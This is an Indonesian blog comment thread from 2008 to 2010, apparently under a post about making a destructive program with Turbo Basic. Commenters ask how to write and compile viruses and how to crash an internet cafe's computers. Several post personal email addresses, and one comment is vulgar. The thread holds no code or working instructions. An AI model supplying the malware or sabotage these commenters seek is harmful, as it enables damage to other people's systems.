# April 12, 2008 11:59 PM

Ndon said:

ngonno ae bangga .q pny progam yang jauh lebih hebat
# April 29, 2008 2:26 PM

FEBRI3 said:

boz tlg donk ajrin cara membuat virus and anti virusnya y?pleace buat tambah pengetahuan.and tlng krim softwarenya ke emailq ya boz.matur suwon sanget
# May 2, 2008 11:12 AM

gatsli said:

tolong beri tau cara membuat virus dengan vb yang paling hebat, kirim ke achmad_gatsli@yahoo.co.id
# May 17, 2008 9:37 AM

sambung said:

ok ok
# May 17, 2008 10:30 AM

jo said:

mbaak..
gmana cara mengkompil program virus dari vb agar menjadi .exe.
thx...
blz ke email ya mbak..
armagedon_gaptek@yahoo.com
# May 20, 2008 12:10 PM

b_all said:




Udah Basi!!!, temuin yang terbaru dong...

# May 24, 2008 12:36 PM

b_all said:




 udah basi..., temuin yang baru dong...

# May 24, 2008 12:40 PM

2k5 said:

Allahu Akbar
# May 24, 2008 12:43 PM

cOe said:

wah seru tu, , , ,
# May 30, 2008 2:43 AM

jack said:

bisa g qt buat program yang bisa bikin warnet mati tiba2?!
# June 11, 2008 4:50 PM

jack said:

bisa g kita buat program y bisa buat warnet mati tiba2?!
# June 11, 2008 4:55 PM

Julianto said:

tlg dong kirimkan prog turbo basic v1.0 ke email saya, sy mau coba buat sesuatu yang dahsyat... trims b4
# June 15, 2008 10:08 PM

kiwids said:

tlg dong kirimkan prog turbo basic v1.0 ke email saya
orank_rese@yahoo.com
di tunggu, terima kasih sebelumnya.
# June 22, 2008 8:17 PM

bro said:

keren harus lebih dipublikasikan
# June 25, 2008 3:07 PM

Cara Membuat Program Perusak « Absanka (Achmad S.) Blog said:

Pingback from  Cara Membuat Program Perusak « Absanka (Achmad S.) Blog
# July 5, 2008 8:58 PM

ghode said:

tolong kirimin ke email sya ya...
ke Ghode_lord@yahoo.com
please ...!
# July 24, 2008 9:29 PM

ghode said:

kirimin prog turbo basic v1.0 dong..?
ke Ghode_lord@yahoo.com
# July 24, 2008 9:31 PM

b_nchoyz said:

saya sangat tertarik pngen nyoba, tp kumaha nya sayah teh gak ngerti sama sekali. hrs gmn cara ngejelasin pd sayah.tolong...dijelasin pake bahasa ndeso aja, biar saya ngerti.terimakasih
# August 5, 2008 9:36 PM

danny_d said:

gimana sich cara bikin virus tanpa turbo basic????
# October 25, 2008 7:26 AM

ANDY said:

YG LAEN DUNK . . . . .
MASAK DRI JAMAN KEN AROK TU DUANK . . . . .
# November 2, 2008 2:34 PM

Fay said:

MMMM....??? Gw Binging Nioch...!!!!
# November 7, 2008 10:11 PM

weldy said:

aya tertarik dalam hal ini
# April 2, 2009 1:20 AM

1111 said:

11111
# April 8, 2009 9:03 PM

ade said:

ajarin dong
# April 15, 2009 10:06 AM

suck said:

memek goreng virus....
anjingk,,,
# May 3, 2009 1:11 AM

nyut...nyut said:

kenapa dengan menyontek dapat membuat bangga diri....!!!
# May 23, 2009 10:03 PM

Billy dock said:

kenapa kalau saya mau Download Turbo Basic v1.0 selalu gagal, dan saya selalu kembali ke halaman seperti ini?...
tolong ya saya dikirimi Turbo Basic v1.0 dan tolong kirim di susuryabilly628@gmail.com
terima kasiH
# June 25, 2010 11:30 AM

Billy dock said:

tlg dong kirimkan prog turbo basic v1.0 ke email saya
susuryabilly628@gmail.com
di tunggu, terima kasih sebelumnya.
soal ya sya da cba download tpi kga bz blik lagi ke halaman ini jga
# June 25, 2010 11:44 AM